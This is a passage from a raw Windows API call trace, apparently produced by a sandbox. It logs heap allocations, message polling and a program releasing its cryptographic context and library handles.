lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.667] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0136.667] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0136.667] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0136.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.667] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0136.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0136.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0136.668] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.668] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0136.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0136.669] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0136.669] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.669] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0136.670] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0136.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.670] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0136.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0136.670] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0136.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0136.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0136.670] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0136.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.670] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0136.670] FreeLibrary (hLibModule=0x756e0000) returned 1 [0136.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.671] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0136.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0136.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0136.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0136.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0136.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0136.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0136.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0136.672] CloseHandle (hObject=0x2a0) returned 1 [0136.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0136.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0136.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0136.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0136.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0136.675] CloseHandle (hObject=0x2d0) returned 1 [0136.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0136.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0136.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36010 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0136.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0136.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0136.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0136.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 